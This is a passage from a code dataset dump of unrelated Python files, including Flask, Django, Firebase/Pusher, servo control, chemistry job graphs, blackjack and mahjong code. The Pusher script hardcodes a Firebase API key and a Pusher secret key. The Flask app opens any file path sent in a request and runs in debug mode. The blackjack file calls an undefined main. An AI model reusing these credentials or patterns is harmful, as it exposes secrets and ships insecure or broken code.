cases.\n # Work on a tmpfile, for safety.\n self.parser.rebase_from_path(src_analysis, tmp_analysis_file, self.rebase_mappings, self._java_home)\n\n shutil.move(tmp_analysis_file, relativized_analysis)\n\n def localize(self, src_analysis, localized_analysis):\n if not os.path.isfile(src_analysis):\n logger.debug(\"AnalysisTools: src_analysis file {} does not exist, skipping localize\".format(src_analysis))\n return\n with temporary_dir() as tmp_analysis_dir:\n tmp_analysis_file = os.path.join(tmp_analysis_dir, 'analysis')\n\n # Work on a tmpfile, for safety.\n self.parser.rebase_from_path(src_analysis, tmp_analysis_file, self.localize_mappings)\n\n shutil.move(tmp_analysis_file, localized_analysis)\n","sub_path":"src/python/pants/backend/jvm/tasks/jvm_compile/analysis_tools.py","file_name":"analysis_tools.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"22445671","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n###############################################################################\n# Girder, large_image plugin framework and tests adapted from Kitware Inc.\n# source and documentation by the Imaging and Visualization Group, Advanced\n# Biomedical Computational Science, Frederick National Laboratory for Cancer\n# Research.\n#\n# Copyright Kitware Inc.\n#\n# Licensed under the Apache License, Version 2.0 ( the \"License\" );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 
License.\n###############################################################################\nimport os.path\nimport tempfile\n\nfrom tests import base\n\n\ndef setUpModule():\n base.enabledPlugins.append('larger_image')\n base.startServer()\n\n\ndef tearDownModule():\n base.stopServer()\n\n\nclass CreateTiffTest(base.TestCase):\n def testCreateTiff(self):\n in_path = os.path.join(os.path.dirname(__file__), 'test_files',\n 'grey10kx5kdeflate.tif')\n compression = 'none'\n quality = 90\n tile_size = 256\n out_path = os.path.join(tempfile.gettempdir(),\n 'grey10kx5kdeflate_tiled.tif')\n import girder.plugins.larger_image.create_tiff as create_tiff\n create_tiff.create_tiff(in_path, compression, quality, tile_size,\n out_path)\n","sub_path":"plugin_tests/create_tiff_test.py","file_name":"create_tiff_test.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"67924592","text":"# Copyright (c) 2013 Qumulo, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy of\n# the License at http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under\n# the License.\n\nimport qumulo.lib.request as request\nfrom qumulo.lib.uri import UriBuilder\n\n@request.request\ndef start_rpc_flood(conninfo, credentials, remote, count):\n method = \"POST\"\n uri = str(UriBuilder(path=\"/v1/debug/flood/rpc\"))\n body = { 'id' : int(remote),\n 'count' : int(count) }\n return request.rest_request(conninfo, credentials, method, uri, body=body)\n\n@request.request\ndef get_flood_status(conninfo, credentials):\n method = \"GET\"\n uri = str(UriBuilder(path=\"/v1/debug/flood/rpc\"))\n return request.rest_request(conninfo, credentials, method, uri)\n","sub_path":"sales-demo/qumulo/rest/flood.py","file_name":"flood.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"509611269","text":"import time\nimport pigpio\nimport firebase_module\n\ndef StartLaundry():\n #fb = firebase_module.firebase(\"store\")\n #fb.cancel()\n servoPush()\n time.sleep(SERVO_TIME)\n servoRelease()\n\ndef calcServoDuty(ratio): # ratio:0-1でサーボ角度を指定\n # SG92Rの制御パルスが0.5ms-2.4msなのでdutyに25000(1000000/20*0.5)-120000(100000/20*2.4)をマッピングする\n duty = 25000 + (120000 - 25000) * ratio\n return duty\n\ndef moveServo(ratio):\n duty = calcServoDuty(ratio)\n pi.hardware_PWM(PORT_PWM, SERVO_PERIOD, int(duty))\n\ndef servoRelease():\n moveServo(SERVO_RELEASE)\n\ndef servoPush():\n moveServo(SERVO_PUSH)\n\nif __name__=='__main__':\n # サーボのPWMパラメータ\n SERVO_RELEASE = 0.6 # ボタン解放状態(サーボモータ角度中間)\n SERVO_PUSH = 0.40 # ボタン押下状態\n SERVO_TIME = 1 # サーボモータを押す時間[秒]\n \n pi = pigpio.pi()\n \n # servo setting\n PORT_PWM = 18\n SERVO_PERIOD = 50 # [Hz] :PWMサイクル20ms\n pi.set_mode(PORT_PWM, pigpio.OUTPUT)\n moveServo(0.5)\n \n \n StartLaundry()\n","sub_path":"rpi-src/laundry/servo.py","file_name":"servo.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"590214776","text":"from flask import 
Flask,render_template, request, redirect\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nimport pandas as pd\r\nfrom io import BytesIO\r\nimport base64\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return render_template(\"index.html\")\r\n\r\n@app.route('/plot', methods =[\"GET\", \"POST\"])\r\ndef salary():\r\n if request.method == \"POST\":\r\n mycsv = request.form.get(\"mycsv\")\r\n eliminate = request.form.get(\"eliminate\")\r\n eliminated = eliminate.split(',')\r\n target = request.form.get(\"target\")\r\n eliminated.append(target)\r\n \r\n\r\n img = BytesIO()\r\n df = pd.read_csv(mycsv)\r\n\r\n X = df.drop(eliminated,axis=1)\r\n y = df[target]\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=101)\r\n\r\n lm = LinearRegression()\r\n lm.fit(X_train,y_train)\r\n\r\n predictions = lm.predict(X_test)\r\n plt.scatter(y_test,predictions)\r\n plt.xlabel('y_test')\r\n plt.ylabel('My_predictions')\r\n plt.title('Scatter Plot')\r\n\r\n score = lm.score(X_test,y_test)\r\n score = score*100\r\n score = str(score)\r\n\r\n plt.savefig(img, format='png')\r\n plt.close()\r\n img.seek(0)\r\n plot_url = base64.b64encode(img.getvalue()).decode('utf8')\r\n\r\n return render_template(\"plot.html\", plot_url = plot_url,accuracy=score)\r\n \r\napp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"474017765","text":"import os \nimport shutil\n\nimport xml\nimport xml.etree.ElementTree as ET\nimport re\n\n\nSCRIPT_DIR = os.path.dirname(__file__)\nROOT_DIR = os.path.abspath(os.path.join(__file__ ,\"..\",\"..\"))\n\nCLIENT_DIR = os.path.join(ROOT_DIR, \"Client\")\nSERVER_DIR = os.path.join(ROOT_DIR, \"Server\")\n\nJRE_PATH = os.path.join(SCRIPT_DIR, \"application\", \"jre\")\n\nLAUNCH4J_CONFIGS = os.path.join(SCRIPT_DIR, \"launch4j_build_configs.xml\")\n\ndef read_output_path(xml_file):\n \"\"\"\n Reads the launch4j config file, and returns the .exe output path\n \"\"\"\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n string= str(xml.etree.ElementTree.tostring(root))\n\n pattern = \"(.*)\"\n x = os.path.normpath(re.findall(pattern, string, flags= re.S)[0])\n return os.path.abspath(x)\n\ndef read_jre_path(xml_file):\n \"\"\"\n Reads the launch4j config file, and returns the path of the bundled jre\n \"\"\"\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n string= str(xml.etree.ElementTree.tostring(root))\n\n pattern = \".*(.*)\"\n x = os.path.normpath(re.findall(pattern, string, flags= re.S)[0])\n return os.path.abspath(x)\n\n\nif __name__ == \"__main__\":\n\n print(\"+===========================================+\")\n print(\"| WINDOWS .EXE PACKAGING SCRIPT ver1.0 |\")\n print(\"+===========================================+\")\n \n output_dir = os.path.abspath(os.path.join(os.path.dirname(read_output_path(LAUNCH4J_CONFIGS)), \"..\"))\n assert os.path.exists(output_dir), f\"ERROR: bad path {output_dir}\"\n\n #jre_path = read_jre_path(LAUNCH4J_CONFIGS)\n jre_path = JRE_PATH\n assert os.path.exists(jre_path), f\"ERROR: bad path {jre_path}\"\n assert len(os.listdir(jre_path)) > 3, \"ERROR: jre files are missing! 
Please ensure that '/application/jre/bin' is a valid path\"\n\n print(\"Copying Client Resources and Classes...\")\n client_classes = os.path.join(CLIENT_DIR, \"target\", \"classes\")\n client_resources = os.path.join(CLIENT_DIR, \"resources\")\n\n client_out = os.path.join(output_dir, \"Client\")\n\n shutil.copytree(client_classes, os.path.join(client_out, \"classes\"))\n shutil.copytree(client_resources, os.path.join(client_out, \"resources\"))\n\n print(\"Copying Server Resources and Classes...\")\n server_classes = os.path.join(SERVER_DIR, \"target\", \"classes\")\n server_resources = os.path.join(SERVER_DIR, \"resources\")\n\n server_out = os.path.join(output_dir, \"Server\")\n\n shutil.copytree(server_classes, os.path.join(server_out, \"classes\"))\n shutil.copytree(server_resources, os.path.join(server_out, \"resources\"))\n\n print(\"Copying Resources...\")\n resources = os.path.join(ROOT_DIR, \"resources\")\n resources_out = os.path.join(output_dir, \"resources\")\n\n shutil.copytree(resources, resources_out)\n\n print(\"Installation Script Complete.\")","sub_path":"Build_exe/package_script.py","file_name":"package_script.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120494728","text":"import pyrebase\nfrom pusher_push_notifications import PushNotifications\n\nconfig = {\n 'apiKey': \"AIzaSyBpu5QxBlcfKqaIemP7XE9Ls5I0enEM0ZA\",\n 'authDomain': \"espe-452bd.firebaseapp.com\",\n 'databaseURL': \"https://espe-452bd.firebaseio.com\",\n 'projectId': \"espe-452bd\",\n 'storageBucket': \"espe-452bd.appspot.com\",\n 'messagingSenderId': \"223433065996\"\n }\n\nfirebase = pyrebase.initialize_app(config)\n\ndb = firebase.database()\npn_client = PushNotifications(\n instance_id='6211a6b6-62d9-4cc2-82de-77b831347c0d',\n secret_key='5710026DFC0CC0A41C58BD2AA9937F1',\n)\n\ndef stream_handler(message):\n print(message)\n if(message['data'] is 1):\n response = pn_client.publish(\n interests=['hello'],\n publish_body={\n 'apns': {\n 'aps': {\n 'alert': 'Hello!',\n },\n },\n 'fcm': {\n 'notification': {\n 'title': 'VOID ALERT',\n 'body': 'PORTA ABERTA',\n },\n },\n },\n )\n\n print(response['publishId'])\nmy_stream = db.child(\"alarm1\").stream(stream_handler,None)","sub_path":"pusher4.py","file_name":"pusher4.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602941118","text":"import json\n\nfrom django.views import View\nfrom django.http import JsonResponse\n\nfrom api.v1.utils.exceptions import FailedToCreateException, UpdateException, DeleteException\nfrom api.v1.utils.filters import BaseFilter\nfrom api.v1.utils.helpers import to_json\nfrom api.v1.utils.api_helpers import APIHelpers\nfrom api.v1.utils.constants import (\n MAX_RESULTS_PER_RESPONSE,\n)\n\n\nclass BaseModelView(View):\n def __init__(self, model, *args, **kwargs):\n super(BaseModelView, self).__init__(*args, **kwargs)\n self.model = model\n self.model_filter = kwargs.pop('model_filter', BaseFilter)()\n\n @property\n def model(self):\n return getattr(self, '_model')\n\n @model.setter\n def model(self, value):\n if not value:\n raise ValueError(\"Model cannot be None\")\n else:\n setattr(self, '_model', value)\n\n @staticmethod\n @APIHelpers.check_if_entity_exists\n def base_find_by_id(model, model_id):\n result = model.find({\n \"id\": model_id\n })\n data = to_json(result)[0]\n return data\n\n @staticmethod\n def base_get(model, 
model_filter=None, *args, **kwargs):\n        skip = int(kwargs.pop('skip', 0))\n        limit = int(kwargs.pop('limit', 25))\n        paginate = kwargs.pop('paginate', True)\n        only = kwargs.pop('only', None)\n        sort = kwargs.pop('sort', None)\n        search = kwargs.pop('search', None)\n        if search:\n            query = model_filter.get_filters(search)\n        else:\n            query = dict(**kwargs)\n\n        if paginate == 'false' or paginate is False:\n            limit = MAX_RESULTS_PER_RESPONSE\n\n        results = model.find(\n            query, skip=skip, limit=limit,\n            projection=only, sort=sort)\n\n        data = to_json(results)\n        return JsonResponse({\n            \"success\": True,\n            \"data\": data,\n            \"total\": results.count()\n        }, status=APIHelpers.OK)\n\n    @staticmethod\n    def base_post(model, data):\n        instance_id = model.create(data)\n        if instance_id:\n            return JsonResponse({\n                \"success\": True,\n                \"data\": BaseModelView.base_find_by_id(model, instance_id)\n            }, status=APIHelpers.CREATED)\n        raise FailedToCreateException()\n\n    @staticmethod\n    @APIHelpers.check_if_entity_exists\n    def base_put(model, model_id, data):\n        result = model.update(model_id, data)\n        if result['Modified']:\n            return JsonResponse({\n                \"success\": True,\n                \"data\": [BaseModelView.base_find_by_id(model, model_id)],\n                \"total\": 1\n            }, status=APIHelpers.OK)\n        raise UpdateException()\n\n    @staticmethod\n    @APIHelpers.check_if_entity_exists\n    def base_patch(model, model_id, data):\n        result = model.patch(model_id, data)\n        if result['ok']:\n            return JsonResponse({\n                \"success\": True,\n                \"data\": [BaseModelView.base_find_by_id(model, model_id)],\n                \"total\": 1\n            }, status=APIHelpers.OK)\n        raise UpdateException()\n\n    @staticmethod\n    @APIHelpers.check_if_entity_exists\n    def base_delete(model, model_id):\n        result = model.delete(model_id)\n        if result['ok']:\n            return JsonResponse({\n                \"success\": True,\n            }, status=APIHelpers.SUCCESSFULLY_DELETED)\n        raise DeleteException()\n\n    @APIHelpers.handle_api_exceptions\n    def get(self, request):\n        return BaseModelView.base_get(self.model, self.model_filter, **request.GET.dict().copy())\n\n    @APIHelpers.handle_api_exceptions\n    def post(self, request):\n        body = json.loads(request.body)\n        return BaseModelView.base_post(self.model, body)\n\n\nclass BaseModelDetailView(View):\n    @property\n    def model(self):\n        return getattr(self, '_model')\n\n    @model.setter\n    def model(self, value):\n        if not value:\n            raise ValueError(\"Model cannot be None\")\n        else:\n            setattr(self, '_model', value)\n\n    def __init__(self, model, *args, **kwargs):\n        super(BaseModelDetailView, self).__init__(*args, **kwargs)\n        self.model = model\n        self.model_filter = kwargs.pop('model_filter', BaseFilter)()\n\n    @APIHelpers.handle_api_exceptions\n    def get(self, request, **kwargs):\n        model_id = kwargs['id']\n        return BaseModelView.base_get(self.model, id=model_id)\n\n    @APIHelpers.handle_api_exceptions\n    def put(self, request, **kwargs):\n        model_id = kwargs['id']\n        body = json.loads(request.body)\n        return BaseModelView.base_put(self.model, model_id, body)\n\n    @APIHelpers.handle_api_exceptions\n    def patch(self, request, **kwargs):\n        model_id = kwargs['id']\n        body = json.loads(request.body)\n        return BaseModelView.base_patch(self.model, model_id, body)\n\n    @APIHelpers.handle_api_exceptions\n    def delete(self, request, **kwargs):\n        model_id = kwargs['id']\n        return BaseModelView.base_delete(self.model, 
model_id)\n","sub_path":"services/inventory/src/services/web/api/v1/utils/base_model_view.py","file_name":"base_model_view.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"518620785","text":"import sys\nfrom graphManager import GraphManager\nfrom os import getcwd, makedirs\nfrom os.path import join, basename\nimport networkx as nx\nfrom amberNode import AmberNode\nfrom fDynamoJobNode import FDynamoNode\nfrom parsers import parseFDynamoCompileScript\nfrom shutil import copyfile, move\nfrom QMMMsetupNode import QMMMsetupNode\nfrom jobNode import JobNode\n\ndef solventInLine(line):\n if \"WAT\" in line:\n return True\n \n if \"CL-\" in line:\n return True\n \n if \"NA+\" in line:\n return True\n \ndef countNoSolventInLine(line):\n noSolvent = 0\n \n for res in line.split():\n if not res in [ \"WAT\" , \"NA+\", \"CL-\" ]:\n noSolvent += 1\n \n return noSolvent\n\ndef getNumberOfNotSolventRes(topologyFile):\n noSolventRes = 0\n \n topF = open(topologyFile, 'r')\n \n line = topF.readline()\n \n while line and not \"%FLAG RESIDUE_LABEL\" in line:\n line = topF.readline()\n \n topF.readline()\n line = topF.readline().upper()\n \n while not solventInLine(line):\n noSolventRes += countNoSolventInLine(line)\n line = topF.readline().upper()\n \n noSolventRes += countNoSolventInLine(line)\n topF.close()\n \n return noSolventRes\n\n\ndef generateGraph(topologyFile, forcefield, compileScript, coordinates):\n jobGraph = nx.DiGraph()\n rootDir = getcwd()\n \n notSolventNo = getNumberOfNotSolventRes(topologyFile)\n\n data = parseFDynamoCompileScript(compileScript)\n\n newNode = JobNode(None, rootDir)\n newNode.status = \"finished\"\n jobGraph.add_node(rootDir, data = newNode)\n\n for crd in coordinates:\n coolDirName = join( rootDir, basename(crd).replace(\".\", \"_\") )\n makedirs(coolDirName)\n\n copyfile( join( rootDir, basename(topologyFile) ), join(coolDirName, basename(topologyFile)) )\n move( join( rootDir, basename(crd) ), join(coolDirName, basename(crd)) )\n\n coolNode = AmberNode(\"amber.slurm\", coolDirName, coolDirName, basename(topologyFile), basename(crd))\n coolNode.runType = \"standardCooling\"\n coolNode.time = \"1:00:00\"\n coolNode.partition = \"plgrid-short\"\n coolNode.processors = 8\n jobGraph.add_node( coolDirName, data = coolNode )\n jobGraph.add_edge(rootDir, coolDirName)\n\n optimDir = join( coolDirName, \"MM_opt\")\n optimNode = AmberNode(\"amber.slurm\", optimDir, optimDir, topologyFile)\n optimNode.NoSolventResidues = notSolventNo\n optimNode.runType = \"standardOptimization\"\n optimNode.time = \"1:00:00\"\n optimNode.partition = \"plgrid-short\"\n jobGraph.add_node( optimDir, data = optimNode )\n jobGraph.add_edge( coolDirName, optimDir)\n\n qmmmSetupDirName = join( coolDirName, \"QMMM_setup\")\n qmmmSetupNode = QMMMsetupNode(\"qmmmSetup.slurm\", qmmmSetupDirName, basename(topologyFile), \"cooled.nc\")\n jobGraph.add_node( qmmmSetupDirName, data = qmmmSetupNode )\n jobGraph.add_edge( optimDir, qmmmSetupDirName)\n\n qmmmOptDir = join(qmmmSetupDirName, \"opt\")\n makedirs(qmmmOptDir)\n copyfile( join( rootDir, basename(forcefield) ), join(qmmmOptDir, basename(forcefield)) )\n\n definedAtoms = data[\"definedAtoms\"]\n constraints = data[\"constraints\"]\n qmmmOptNode = FDynamoNode(data[\"inputFile\"], qmmmOptDir)\n qmmmOptNode.coordsIn = \"coordsIn.crd\"\n qmmmOptNode.coordsOut = \"coordsOut.crd\"\n qmmmOptNode.verification = [ \"Opt\" ]\n qmmmOptNode.slurmFile = None\n 
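# no batch script is attached to this node (slurmFile = None) and automatic\n        # restarts stay off; most of the settings below come from the compile script\n        # parsed into 'data' above\n        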
qmmmOptNode.autorestart = False\n qmmmOptNode.forceField = data[\"forceField\"]\n qmmmOptNode.flexiblePart = data[\"flexiblePart\"]\n qmmmOptNode.sequence = data[\"sequence\"]\n qmmmOptNode.qmSele = data[\"qmSele\"]\n qmmmOptNode.templateKey = \"QMMM_opt_mopac_no_hess\"\n qmmmOptNode.fDynamoPath = data[\"fDynamoPath\"]\n qmmmOptNode.charge = data[\"charge\"]\n qmmmOptNode.method = data[\"method\"]\n\n jobGraph.add_node( qmmmOptDir, data = qmmmOptNode )\n jobGraph.add_edge( qmmmSetupDirName, qmmmOptDir)\n\n qmmmScanDir = join(qmmmSetupDirName, \"scan\")\n qmmmScanNode = FDynamoNode(\"scan.f90\", qmmmScanDir)\n qmmmScanNode.verification = [ \"scan1D\" ]\n qmmmScanNode.readInitialScanCoord = True\n qmmmScanNode.templateKey = \"QMMM_scan1D_mopac\"\n qmmmScanNode.additionalKeywords = { \"scanDir\" : \"+\", \"coordScanStart\" : \"\" ,\n \t\"iterNo\" : \"80\", \"definedAtoms\" : definedAtoms, \"constraints\" : constraints }\n\n jobGraph.add_node( qmmmScanDir, data = qmmmScanNode )\n jobGraph.add_edge( qmmmOptDir, qmmmScanDir)\n\n qmmmTSoptDir = join(qmmmSetupDirName, \"ts_search\")\n qmmmTSoptNode = FDynamoNode(\"tsSearch.f90\", qmmmTSoptDir)\n qmmmTSoptNode.verification = [\"Opt\" , \"Freq\"]\n qmmmTSoptNode.noOfExcpectedImaginaryFrequetions = 1\n qmmmTSoptNode.templateKey = \"QMMM_opt_mopac\"\n qmmmTSoptNode.additionalKeywords = { \"ts_search\" : \"true\" }\n qmmmTSoptNode.coordsIn = \"coordsStart.crd\"\n qmmmTSoptNode.coordsOut = \"coordsDone.crd\"\n\n jobGraph.add_node( qmmmTSoptDir, data = qmmmTSoptNode )\n jobGraph.add_edge( qmmmScanDir, qmmmTSoptDir)\n\n return jobGraph\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 5:\n print(\"graphMassiveQMMMsetup topology file, forcefield, compile script, amber coordinates\")\n else:\n sm = GraphManager()\n currentDir = getcwd()\n graph = sm.isGraphHere(currentDir)\n \n topology = sys.argv[1]\n forcefield = sys.argv[2]\n compileScript = sys.argv[3]\n coordinates = sys.argv[4:]\n if not graph:\n newGraph = generateGraph(topology, forcefield, compileScript, coordinates)\n \n result = sm.addGraph(newGraph, currentDir)\n if result:\n sm.buildGraphDirectories(newGraph)\n sm.saveGraphs()\n print(\"Created new graph\")\n else:\n print(\"Cannot create more than one graph in the same directory\")","sub_path":"massiveQMMMsetup.py","file_name":"massiveQMMMsetup.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"51649830","text":"import json\n\ndef parseToSong(string):\n temp = string.split(\",\")\n print (temp)\n\nclass Song:\n '''\n Initiates a song object. 
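A hypothetical call with made-up values: Song(\"name\", \"composer\", past, present, future, \"1.0\"), where past/present/future are dicts shaped as described below.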
\n Args [info, past, present, future, added in]\n info : dictionary\n {\n name: \"name\",\n composer: \"composer\"\n }\n past/present/future: dictionary \n {\n diff: [1-11],\n scorepoten: [0.00-11.2],\n notecount: [0-1450]\n }\n '''\n def __init__ (self, name, comp, pst, prs, ftr, incl):\n self.name = name\n self.comp = comp\n self.pst = pst\n self.prs = prs\n self.ftr = ftr\n self.incl = incl\n \n def outAsString(self):\n out = {\n \"name\": self.name,\n \"composer\": self.comp,\n \"past\": self.pst,\n \"present\": self.prs,\n \"future\": self.ftr,\n \"incl\": self.incl\n }\n return json.dumps(out, indent=4)\n \n def print(self):\n print (self.outAsString())","sub_path":"lib/SongClass.py","file_name":"SongClass.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"295201743","text":"\"\"\"Monte Carlo Control for the game of Blackjack.\n\nUses the OpenAI Gym Blackjack environment.\n\"\"\"\nimport collections\nimport gym\nimport numpy as np\nimport typing\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\n\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer(\n 'num_episodes', 10,\n 'The number of episodes to run.')\nflags.DEFINE_bool(\n 'casino_blackjack_reward', True,\n 'If True, the reward for a natural hand (an Ace and a 10 or face card) is '\n '1.5. Else the reward for the natural hand is the same as for a winning '\n 'hand, 1.0.')\n\n# The observation space is player score, dealer score, and whether or not there\n# is a usable ace in the player's hand. A usable ace means that the sum of the\n# hand with an Ace value of 11 is <= 21.\nobservation_t = typing.Tuple[int, int, bool]\nObservation = collections.namedtuple(\n 'Observation', ['player_score', 'dealer_score', 'usable_ace'])\n\n# The action space is a single bool, either True to hit, or False to stick.\naction_t = bool\n\n# A single step includes the observation, the selected action, and its reward.\nstep_t = typing.Tuple[Observation, action_t, float]\nStep = collections.namedtuple(\n 'Step', ['observation', 'action', 'reward'])\n\n\nclass MonteCarloControlBlackjack(object):\n \"\"\"A Monte Carlo Control \"agent\" for the game of Blackjack.\"\"\"\n\n def __init__(self, casino_blackjack_reward: bool,\n policy: typing.Callable[[Observation], action_t]):\n \"\"\"Create the agent.\n\n Args:\n casino_blackjack_reward: If True, the reward for a natural blackjack is\n 1.5.\n policy: A callback which accepts an Observation and returns True to Hit,\n or False to stick.\n \"\"\"\n self.environment = gym.make('Blackjack-v0')\n self.environment.natural = casino_blackjack_reward\n self.policy = policy\n # Value table. The dimensions are: [player_score, dealer_score, usable_ace]\n self.N = np.zeros([21, 10, 2], dtype=np.int32)\n self.S = np.zeros([21, 10, 2], dtype=np.float)\n self.V = np.zeros([21, 10, 2], dtype=np.float)\n # The total number of episodes.\n self.num_episodes = 0\n\n def Reset(self):\n \"\"\"Reset the internal state.\"\"\"\n self.N.fill(0)\n self.S.fill(0)\n self.V.fill(0)\n self.num_episodes = 0\n\n def GetAnEpisode(self) -> typing.List[Step]:\n \"\"\"Run an episode.\n\n The first step is the game opening. 
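Its observation comes from resetting the environment. 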
The action and reward are both None.\n\n Returns:\n A list of Step tuples.\n \"\"\"\n done = False\n steps = [Step(Observation(*self.environment.reset()), None, None)]\n while not done:\n action = self.policy(steps[-1].observation)\n obs_, reward_, done, _ = self.environment.step(action)\n steps.append(Step(Observation(*obs_), action, reward_))\n return steps\n\n def Run(self, n: int):\n for i in range(n):\n self.num_episodes += 1\n episode = self.GetAnEpisode()\n logging.debug(\n 'Episode %d, steps = %d, final_score = %02d:%02d, reward = %.1f',\n i, len(episode), episode[-1].observation.player_score,\n episode[-1].observation.dealer_score, episode[-1].reward)\n for j in range(1, len(episode)):\n step = episode[j]\n indices = (step.observation.player_score - 1,\n step.observation.dealer_score - 1,\n 1 if step.observation.usable_ace else 0)\n if j < len(episode) - 1:\n self.N[indices] += 1\n self.S[indices] += sum(\n episode[k].reward for k in range(j, len(episode)))\n self.V[indices] = self.S[indices] / self.N[indices]\n\n\nif __name__ == '__main__':\n app.run(main)\n","sub_path":"learn/reinforcement_learning/monte_carlo_control_blackjack.py","file_name":"monte_carlo_control_blackjack.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"623287296","text":"\nfrom collections import Counter\nimport copy\n\nclass Option: # each options catagotized by all possible pairs e.g. pair = [3,3] leftovers = [3,4,5,6,7,8,9,9,9]\n def __init__(self, pair, threes, series,leftovers):\n self.pair = pair\n self.threes = threes\n self.series = series\n self.leftovers = leftovers\n\n def __repr__(self):\n return \"Pair: \" + str(self.pair) + \" Sets: \" + str(self.threes) + \" Sequences: \" + str(self.series) + \" Left: \" + str(self.leftovers)\n\n def __str__(self):\n return \"Pair: \" + str(self.pair) + \" Sets: \" + str(self.threes) + \" Sequences: \" + str(self.series) + \" Left: \" + str(self.leftovers)\n\n#please ignore the following assignments\nDragons = [100]\nOnes = [1,10,20]\nNines = [9,19,29]\nTiles = [1,2,3,4,5]\nTiles_Raw = [1,2,3,4,5]\nhas_one_nine = False\nhas_gang = False\n\n\n\ndef Get_Pairs(tiles):\n pairs = []\n for t in set(tiles):\n if tiles.count(t) >= 2:\n pairs.append([t, t])\n return pairs\n\ndef Get_Threes(tiles):\n sets = []\n for t in set(tiles):\n if tiles.count(t) >= 3:\n sets.append([t, t, t])\n return sets\n\ndef Get_Series(tiles):\n # returns a list of all the sequences\n series = []\n \n tiles_no_dup = sorted(list(set(tiles)))\n temp = [[tiles_no_dup[0]]]\n\n for i in range (1,len(tiles_no_dup)):\n prev_tile = tiles_no_dup[i-1]\n\n if tiles_no_dup[i] != prev_tile+1:\n temp = [[tiles_no_dup[i]]]\n continue\n\n temp_series = [] \n for t in temp:\n t.append(tiles_no_dup[i]) #adding the valid element above to the current series in progress\n if len(t) != 3:\n temp_series.append(t) #adding current element to a temporary series\n else:\n series.append(t) #once reached length 3 the temp series gets added\n temp = temp_series\n temp.append([tiles_no_dup[i]])\n\n return series\n\ndef Map_Remainings(patterns_found, tiles): # combos are a collection of existed pairs or sequences, \n #this fcn removes them from the overall list, and returns the mapping of patterns and their corresponding leftovers\n\n collections = []\n for pattern in patterns_found:\n leftovers = copy.deepcopy(tiles)\n\n for p in pattern:\n leftovers.remove(p)\n collections.append((pattern, leftovers))\n\n return 
collections\n\ndef find_winning_hand(tiles):\n options = []\n winning_hand = []\n completed = []\n\n pairs = Get_Pairs(tiles)\n collections_by_pairs = Map_Remainings(pairs, tiles)\n\n #create all collections for each pulling one pair out cases\n for c in collections_by_pairs:\n options.append(Option([c[0]],[],[], c[1]))\n\n while len(options) > 0:\n option = options.pop(0)\n three_combos = Get_Threes(option.leftovers)\n if len(three_combos) != 0:\n possi = Map_Remainings(three_combos, option.leftovers)\n for p in possi:\n threes = copy.deepcopy(option.threes)\n threes.append(p[0])\n new_option = Option(option.pair, threes, option.series, p[1])\n if len(p[1]) == 0:\n s_defined = copy.deepcopy(threes)\n s_defined.extend(option.series)\n s_defined = sorted(s_defined)\n if not(s_defined in completed):\n winning_hand.append(new_option)\n completed.append(s_defined)\n continue\n options.append(new_option)\n\n series_combos = Get_Series(option.leftovers)\n if len(series_combos) != 0:\n possi = Map_Remainings(series_combos, option.leftovers)\n for p in possi:\n series = copy.deepcopy(option.series)\n series.append(p[0])\n new_option = Option(option.pair, option.threes, series, p[1])\n if len(p[1]) == 0:\n s_defined = copy.deepcopy(series)\n s_defined.extend(option.threes)\n s_defined = sorted(s_defined)\n if not(s_defined in completed):\n winning_hand.append(new_option)\n completed.append(s_defined)\n continue\n options.append(new_option)\n\n real_wins = []\n for wh in winning_hand:\n if len(wh.series) == 0 or len(wh.threes) == 0:\n continue\n real_wins.append(wh)\n return real_wins\n\ntiles = 